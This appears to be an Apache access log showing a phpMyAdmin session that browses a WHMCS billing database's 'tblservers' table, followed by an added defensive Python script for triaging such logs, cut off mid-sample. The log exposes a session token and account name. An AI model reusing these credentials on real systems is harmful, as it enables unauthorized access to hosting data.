46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_status.png HTTP/1.1" 200 673 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_process.png HTTP/1.1" 200 512 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_export.png HTTP/1.1" 200 641 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/left_nav_bg.png HTTP/1.1" 200 215 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=left&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/database.png HTTP/1.1" 200 390 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=left&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:28 -0800] "GET /phpmyadmin/themes/pmahomme/jquery/jquery-ui-1.8.custom.css HTTP/1.1" 200 30846 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:28 -0800] "GET /phpmyadmin/js/cross_framing_protection.js?ts=1324498073 HTTP/1.1" 200 331 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:28 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:28 -0800] "GET /phpmyadmin/js/update-location.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:31 -0800] "-" 408 - "-" "-"
46.116.94.55 - - [22/Jan/2012:01:48:34 -0800] "GET /phpmyadmin/js/jquery/jquery-ui-1.8.custom.js?ts=1324498073 HTTP/1.1" 200 190765 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:34 -0800] "GET /phpmyadmin/js/jquery/jquery.sprintf.js?ts=1324498073 HTTP/1.1" 200 987 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:34 -0800] "GET /phpmyadmin/themes/pmahomme/img/window-new.png HTTP/1.1" 200 583 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:34 -0800] "GET /phpmyadmin/themes/pmahomme/img/tab_bg.png HTTP/1.1" 200 160 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:35 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_more.png HTTP/1.1" 200 1002 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:35 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_theme.png HTTP/1.1" 200 856 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:35 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_notice.png HTTP/1.1" 200 666 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:36 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_passwd.png HTTP/1.1" 200 435 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:36 -0800] "GET /phpmyadmin/themes/pmahomme/img/input_bg.gif HTTP/1.1" 200 162 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:36 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_lang.png HTTP/1.1" 200 743 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:38 -0800] "GET /phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e HTTP/1.1" 200 2663 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:38 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:39 -0800] "GET /phpmyadmin/js/update-location.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:40 -0800] "GET /phpmyadmin/js/common.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/cross_framing_protection.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/update-location.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/jquery/jquery-ui-1.8.custom.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/db_structure.js?ts=1324498073 HTTP/1.1" 200 3178 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/config.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/functions.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_props.png HTTP/1.1" 200 663 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/jquery/jquery.qtip-1.0.0.min.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_search.png HTTP/1.1" 200 615 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_asc.png HTTP/1.1" 200 201 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_browse.png HTTP/1.1" 200 566 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_select.png HTTP/1.1" 200 680 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_insrow.png HTTP/1.1" 200 228 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_empty.png HTTP/1.1" 200 363 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_drop.png HTTP/1.1" 200 715 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:43 -0800] "GET /phpmyadmin/themes/pmahomme/img/bd_browse.png HTTP/1.1" 200 200 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:43 -0800] "GET /phpmyadmin/themes/pmahomme/img/bd_select.png HTTP/1.1" 200 459 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:43 -0800] "GET /phpmyadmin/themes/pmahomme/img/bd_empty.png HTTP/1.1" 200 231 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:52 -0800] "GET /phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs HTTP/1.1" 200 275988 "https://mydomain.com/phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:52 -0800] "GET /phpmyadmin/js/messages.php?lang=en&db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e HTTP/1.1" 200 4965 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:52 -0800] "GET /phpmyadmin/themes/pmahomme/img/item_ltr.png HTTP/1.1" 200 162 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:53 -0800] "GET /phpmyadmin/themes/pmahomme/img/arrow_ltr.png HTTP/1.1" 200 184 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:53 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_print.png HTTP/1.1" 200 731 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:53 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_tblanalyse.png HTTP/1.1" 200 234 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:53 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_newtbl.png HTTP/1.1" 200 325 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:54 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_sbrowse.png HTTP/1.1" 200 566 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:55 -0800] "GET /phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs HTTP/1.1" 200 52935 "https://mydomain.com/phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:55 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_snewtbl.png HTTP/1.1" 200 733 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:00 -0800] "GET /phpmyadmin/js/cross_framing_protection.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:00 -0800] "GET /phpmyadmin/js/jquery/jquery-ui-1.8.custom.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/pMap.js?ts=1324498073 HTTP/1.1" 200 1915 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/functions.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0 HTTP/1.1" 200 36728 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/update-location.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_chart.png HTTP/1.1" 200 541 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/sql.js?ts=1324498073 HTTP/1.1" 200 15945 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/config.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_views.png HTTP/1.1" 200 700 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/jquery/jquery.qtip-1.0.0.min.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_tbl.png HTTP/1.1" 200 714 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_tblexport.png HTTP/1.1" 200 641 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_tblimport.png HTTP/1.1" 200 629 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_fulltext.png HTTP/1.1" 200 244 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_edit.png HTTP/1.1" 200 444 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:02 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_success.png HTTP/1.1" 200 537 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:02 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_inline_edit.png HTTP/1.1" 200 618 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:04 -0800] "GET /phpmyadmin/themes/pmahomme/img/tab_hover_bg.png HTTP/1.1" 200 1278 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:04 -0800] "GET /phpmyadmin/themes/pmahomme/img/marked_bg.png HTTP/1.1" 200 977 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
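A way to cut a dump like the one above down to what matters during triage, as an added example that is not part of the original post: it parses Apache combined-format lines, drops static assets and timed-out requests, and lists which databases and tables each IP and logged-in user opened. The sample lines, IP addresses, user name, database name and token are constructed; only the table name `tblservers` is reused from the thread.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
STATIC_EXT = (".js", ".css", ".png", ".gif", ".jpg", ".ico")

# Constructed sample input (placeholder IPs, user, database and token).
SAMPLE_LOG = '''\
203.0.113.7 - - [22/Jan/2012:01:48:34 -0800] "GET /phpmyadmin/themes/pmahomme/img/tab_bg.png HTTP/1.1" 200 160 "https://example.test/phpmyadmin/main.php?token=TOKEN" "Mozilla/5.0"
203.0.113.7 - - [22/Jan/2012:01:48:36 -0800] "-" 408 - "-" "-"
203.0.113.7 - dbuser [22/Jan/2012:01:48:38 -0800] "GET /phpmyadmin/index.php?db=shop_db&token=TOKEN HTTP/1.1" 200 2663 "https://example.test/phpmyadmin/navigation.php?token=TOKEN" "Mozilla/5.0"
203.0.113.7 - - [22/Jan/2012:01:48:39 -0800] "GET /phpmyadmin/js/update-location.js?ts=1 HTTP/1.1" 304 - "https://example.test/phpmyadmin/index.php?db=shop_db&token=TOKEN" "Mozilla/5.0"
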